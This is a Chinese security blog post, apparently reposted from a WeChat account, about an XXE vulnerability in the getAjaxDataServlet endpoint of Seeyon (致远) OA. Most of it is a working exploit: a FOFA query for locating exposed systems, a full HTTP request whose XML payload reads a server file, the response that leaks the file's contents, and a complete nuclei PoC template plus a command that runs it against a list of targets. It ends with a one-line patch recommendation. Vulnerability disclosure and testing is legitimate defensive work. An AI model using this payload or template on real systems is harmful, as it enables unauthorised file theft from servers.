致远OA getAjaxDataServlet XXE漏洞

admin 2024年2月26日13:57:30评论98 views字数 3677阅读12分15秒阅读模式

01漏洞名称

致远OA getAjaxDataServlet XXE漏洞

02漏洞影响

致远互联-OA

致远OA getAjaxDataServlet XXE漏洞

03漏洞描述

致远互联协同运营平台,打造企业数智运营中枢,助力企业实现办公业务、财务、管理与运营的一体化运作,帮助企业加强链接、用好数据做好决策,全面实现数字化。该系统getAjaxDataServlet接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。

04FOFA搜索语句

app="致远互联-OA"

致远OA getAjaxDataServlet XXE漏洞

05漏洞复现

向靶场发送如下数据包,查看C://windows//win.ini文件内容

POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1Host: 192.168.40.131:8099User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36Connection: closeContent-Length: 583Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

响应内容如下

HTTP/1.1 200Connection: closeContent-Length: 1007Content-Type: text/html;charset=utf-8Date: Mon, 08 Jan 2024 04:25:57 GMTServer: SY8045Set-Cookie: JSESSIONID=0DA12779FEE71DF69052322AD81A3096; Path=/seeyon; HttpOnly















<!DOCTYPE html><html><head><title>异常处理页面</title>



<link rel="stylesheet" href="/seeyon/common/all-min.css?V=V8_0_200613_25650"><script type="text/javascript">if(parent && parent.errorHandle)    parent.errorHandle("");</script></head><body class="page_color">

    提示信息:<BR/>系统级错误,请检查localhost.log查看详细异常堆栈:<br/>com.kg.commons.KgException [err=[KgCommonsError ]] invoke param:[KgSignatureInfo [textinfo=KgTextInfo [signText=null, fontName=宋体, fontColor=18, fontSize=12, fontStyle=0, posType=CENTER_MIDDLE, breakWord=true], waterImg=null, elemId=null, left=0, top=0], [KgProtectedData [fieldName=id, fieldDesc=caption, fieldValue=; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1, encodeValue=OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0Cltmb250c10KW2V4dGVuc2lvbnNdClttY2kgZXh0ZW5zaW9uc10KW2ZpbGVzXQpbTWFpbF0KTUFQST0xCg==]]]



</body></html>

返回信息中包含文件内容,漏洞复现成功。

06

nuclei poc

poc文件内容如下

id: seeyon-getAjaxDataServlet-xxe

info:  name: 致远OA getAjaxDataServlet XXE漏洞  author: fgz  severity: critical  description: 致远互联协同运营平台,打造企业数智运营中枢,助力企业实现办公业务、财务、管理与运营的一体化运作,帮助企业加强链接、用好数据做好决策,全面实现数字化。该系统getAjaxDataServlet接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。  metadata:    max-request: 1    fofa-query: app="致远互联-OA"    verified: truerequests:  - raw:      - |+        POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36        Content-Type: application/x-www-form-urlencoded                S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'for 16-bit app')"

运行POC

nuclei.exe -t mypoc/致远/seeyon-getAjaxDataServlet-xxe.yaml -l data/致远互联-OA.txt

致远OA getAjaxDataServlet XXE漏洞

07修复建议

升级到最新版本或者打上官方发布的补丁。

https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=170

原文始发于微信公众号(AI与网安):致远OA getAjaxDataServlet XXE漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月26日13:57:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远OA getAjaxDataServlet XXE漏洞http://cn-sec.com/archives/2525865.html

发表评论

匿名网友 填写信息